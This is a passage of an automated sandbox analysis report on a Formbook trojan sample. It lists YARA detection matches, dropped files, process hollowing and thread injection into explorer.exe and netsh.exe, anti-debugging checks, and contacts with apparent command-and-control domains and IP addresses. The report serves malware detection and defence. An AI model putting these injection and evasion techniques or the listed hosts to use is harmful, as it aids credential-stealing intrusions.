          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B18E70
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0042193D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00421284
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040B453
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040B457
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00422429
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040FE87
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B18E70
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: String function: 00B1D900 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: String function: 00B22574 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E087 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DEA7 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DF57 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DFD7 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E081 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004012A4 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DF52 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041DFD2 NtClose,
          Source: qHpeBvr9cR.exeReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exeVirustotal: Detection: 36%
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile read: C:\Users\user\Desktop\qHpeBvr9cR.exeJump to behavior
          Source: qHpeBvr9cR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\qHpeBvr9cR.exe C:\Users\user\Desktop\qHpeBvr9cR.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\nsx95CB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/4
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25A15 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210E9 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0042109C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00421153 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040EAA3 push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E5D0 push ecx; iretd
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00419F38 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041FF93 push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25A15 push ecx; ret
          Source: febcldoukq.exe.0.drStatic PE information: section name: .00cfg
          Source: febcldoukq.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\febcldoukq.exeJump to dropped file
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.6 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.338206694.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2258B GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2009E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2418D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2009E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2418D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040C317 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D720 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D720 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\febcldoukq.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.340255020.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
